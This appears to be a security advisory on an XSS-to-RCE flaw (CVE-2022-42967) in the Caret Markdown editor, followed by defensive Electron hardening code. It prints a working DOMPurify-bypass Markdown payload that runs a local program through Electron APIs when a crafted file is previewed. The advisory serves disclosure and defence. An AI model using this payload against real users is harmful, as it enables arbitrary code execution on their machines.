JFrog Security Research

Caret XSS RCE

CVE-2022-42967 | CVSS 7.5

JFrog Severity:high

Published 10 Jan. 2023 | Last updated 10 Jan. 2023

XSS in Caret markdown editor leads to remote code execution when viewing crafted Markdown files

Caret Editor

All versions are affected

This issue is caused by insufficient validation of the document data that is sent to the Electron renderer. Specifically, in the getMarkdownHtmlElement function in the file app.asar/extensions/Markdown/Markdown.js, the sanitized document HTML is assigned directly to the DOM -

t.firstChild.innerHTML = DOMPurify.sanitize(r)

An older version of DOMPurify is used, which has known filtering bypasses (see the payload below).

Opening a document with the following contents, when preview mode is enabled, leads to the immediate execution of an arbitrary process (in this case, Calculator), because the sanitizer bypass yields an inline event handler that runs with access to Node and Electron APIs -

<form><math><mtext></form><form><mglyph><style></math><img src
onerror="try{ const {shell} = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">

Disable Caret's "Preview Mode"
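For application developers, the escalation from XSS to RCE depends on the renderer being able to call require('electron'). The following is an added example, not Caret's code, showing Electron main-process settings that keep a sanitizer bypass confined to the DOM, plus an audit helper for such settings; previewWebPreferences, rendererHardeningFindings, createPreviewWindow and the preloadPath argument are assumed names, while the webPreferences keys and webContents calls are real Electron APIs (Electron 12 or later is assumed for setWindowOpenHandler). Updating the bundled DOMPurify is still required; this only limits the blast radius when the sanitizer fails.

```javascript
'use strict';

// Hardened renderer settings for a window that renders untrusted Markdown.
// Each value is set explicitly so the result does not depend on the
// version-specific defaults of the Electron release in use.
function previewWebPreferences(preloadPath) {
  return {
    nodeIntegration: false,   // page scripts get no require()/process
    contextIsolation: true,   // preload and page share no JS realm
    sandbox: true,            // OS-level renderer sandbox
    webSecurity: true,        // keep same-origin policy and CSP enforcement
    preload: preloadPath,     // the only bridge, exposed via contextBridge
  };
}

// Audit helper: lists settings that would let a renderer-side XSS reach
// Node/Electron APIs. A key counts as safe only when set to the safe value
// explicitly, so an omitted key is reported. Empty array means hardened.
function rendererHardeningFindings(prefs) {
  const findings = [];
  if (prefs.nodeIntegration) findings.push('nodeIntegration enabled');
  if (!prefs.contextIsolation) findings.push('contextIsolation disabled');
  if (!prefs.sandbox) findings.push('sandbox disabled');
  if (prefs.webSecurity === false) findings.push('webSecurity disabled');
  if (prefs.nodeIntegrationInWorker) findings.push('nodeIntegrationInWorker enabled');
  return findings;
}

// Creates the preview window. The BrowserWindow class is injected so the
// function can be exercised outside Electron; in the app pass
// require('electron').BrowserWindow.
function createPreviewWindow(BrowserWindowCtor, preloadPath) {
  const win = new BrowserWindowCtor({
    webPreferences: previewWebPreferences(preloadPath),
  });
  // Untrusted content must neither open new windows nor navigate the editor.
  win.webContents.setWindowOpenHandler(() => ({ action: 'deny' }));
  win.webContents.on('will-navigate', (event) => event.preventDefault());
  return win;
}
```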